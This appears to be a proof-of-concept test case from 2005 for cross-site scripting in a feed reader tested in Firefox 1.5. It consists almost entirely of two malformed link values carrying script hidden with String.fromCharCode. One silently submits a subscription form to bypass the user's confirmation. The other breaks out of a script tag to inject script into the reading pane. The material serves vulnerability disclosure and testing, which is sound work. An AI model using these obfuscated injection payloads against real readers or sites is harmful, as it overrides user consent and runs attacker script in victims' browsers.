Malformed channel link bypasses subscription confirmation; malformed item link injects script into reading pane when you read the feed. Published on 2005-11-30. Tested in Firefox 1.5. http://<script>setTimeout(String.fromCharCode(100,111,99,117,109,101,110,116,46,102,111,114,109,115,46,115,117,98,102,111,114,109,46,115,117,98,109,105,116,40,41),100)</script> http://</script><script>alert(String.fromCharCode(73,32,99,97,110,32,115,116,105,108,108,32,98,101,32,101,118,105,108,46))</script> foo